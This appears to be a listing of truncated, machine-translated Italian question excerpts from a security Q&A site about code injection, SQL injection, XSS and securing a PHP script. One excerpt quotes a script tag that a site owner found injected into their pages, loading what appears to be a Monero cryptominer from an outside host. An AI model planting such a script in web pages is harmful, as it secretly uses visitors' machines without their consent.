Dopo aver letto sulla sicurezza basata sulla lingua, sembra che i protocolli definiti usando grammatiche prive di contesto o regolari siano altamente resistenti agli attacchi di iniezione di codice.
Esistono buoni protocolli di sicurezza priv...
Recentemente ho notato il seguente javascript su molte delle mie pagine (di solito appena prima della chiusura del body tag):
<script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=monerov.ingest.cryptok...
Voglio imparare sql injection, xss e altri attacchi web. Sono nuovo di tutto questo, solo un principiante. Voglio sapere quale software usare. Posso usare Windows per questi attacchi e quale software devo usare? Sono venuto a conoscenza di alcun...
Mi chiedo se sia possibile fare un'iniezione di codice in lingue compilate o interpretate? C'è qualche tipo di vettore di attacco in quest'area?
Whit "code injection" Voglio dire fornire uno snippet di codice come input che verrà eseguito ins...
Supponiamo che ci sia un sito web creato con alcuni CMS FOSS (come Drupal) e la directory dei siti web è di proprietà e raggruppata da root (invece www-data come comune in Apache in Nginx) e un amico del proprietario del sito vede erro...
Mi chiedo se possiamo considerare l'iniezione di tag HTML come a , image , img , video , audio , marquee o iframe senza un attributo evento come XSS ? Poiché non è coinvolto alcun JavaScript e quindi non è incluso e...
Ho un progetto Python che carica dinamicamente script Python da una serie di directory specificate ed esegue una funzione prevista su di essi (il framework si aspetta un nome di funzione che richiede un certo numero di parametri, ma l'implementa...
Ho studiato i problemi più comuni relativi all'iniezione. È possibile incorporare un meccanismo di filtraggio per evitare il lato client dell'iniezione?
Ad esempio, controllare l'URL della barra degli indirizzi per i parametri aggiunti malevoli...
Ho recentemente creato uno script di registrazione PHP per un sito web su cui un amico e io stiamo lavorando. Ho letto i pericoli dell'iniezione di MySQL e mi chiedevo se il mio codice attuale fosse protetto da tali attacchi, o se fossero necess...